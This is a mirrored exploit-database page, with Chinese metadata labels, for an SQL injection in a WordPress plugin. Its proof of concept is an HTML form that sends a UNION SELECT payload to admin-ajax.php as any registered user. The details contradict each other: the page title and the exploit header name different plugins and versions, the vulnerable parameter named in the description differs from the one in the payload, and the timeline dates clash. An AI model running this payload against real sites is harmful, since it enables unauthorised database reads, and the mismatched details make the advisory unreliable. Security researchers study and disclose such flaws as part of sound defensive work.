WordPress Plugin WP Private Messages 1.0.1 – SQL Injection (2)

  • 作者: Lenon Leite
    日期: 2017-01-27
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/41180/
  • # Exploit Title:WP Email Users – 1.4.1 – Plugin WordPress – Sql Injection
    # Exploit Author: Lenon Leite
    # Vendor Homepage: https://wordpress.org/plugins/wp-email-users/
    # Software Link: https://wordpress.org/plugins/wp-email-users/
    # Contact: http://twitter.com/lenonleite
    # Website: http://lenonleite.com.br/
    # Category: webapps
    # Version: 1.3.1
    # Tested on: Ubuntu 14.04
    
    1 - Description:
    
    Type user access:is accessible for any registered user
    
    $_REQUEST[‘edit’] is escaped wrong. Attack with Sql Injection
    
    http://lenonleite.com.br/blog/2017/01/17/english-wp-email-users-1-4-1-plugin-wordpress-sql-injection/
    
    2 - Proof of Concept:
    
    1 – Login as regular user (created using wp-login.php?action=register):
    
    2 – Using:
    
    <form action="http://localhost:8080/wp-admin/admin-ajax.php" method="post">
    <input type="text" name="action" value="weu_my_action">
    <input type="text" name="filetitle" value="0 UNION SELECT CONCAT(name,char(58),slug) FROM wp_terms WHEREterm_id=1">
    <input type="text" name="temp_sel_key" value="select_temp">
    <input type="submit" name="">
    </form>
    
    
    3 - Timeline:
    
    12/01/2016 – Discovered
    13/12/2016 – Vendor not finded